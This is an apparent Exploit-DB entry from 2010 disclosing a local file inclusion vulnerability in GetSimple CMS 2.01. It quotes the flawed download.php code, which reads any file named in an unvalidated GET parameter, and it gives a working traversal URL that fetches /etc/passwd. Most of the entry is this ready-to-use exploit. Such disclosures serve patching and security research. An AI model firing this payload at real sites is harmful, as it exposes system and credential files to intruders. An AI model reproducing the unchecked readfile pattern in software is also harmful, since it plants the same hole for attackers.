Getsimple CMS 2.01 - Local File Inclusion
Author: Batch
type: webapps
platform: php
port:
date_added: 2010-05-05
date_updated: 2018-01-25
verified: 1
codes: OSVDB-64392
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comGetSimple_2.01.zip
# Exploit Title: GetSimple 2.01 LFI
# Date: 4/5/2010
# Author: Batch
# Software Link: http://www.box.net/get-simple
# Version: 2.01
#Special Conditions: Must be admin.
# Code :
...
# get file
if (file_exists($_GET['file'])) {
readfile($_GET['file'], 'r');
}
exit;
...
http://localhost/GetSimple_2.01/admin/download.php?file=../../../../../etc/passwd
#-Batch
#ryan1918.com
#Everyone else.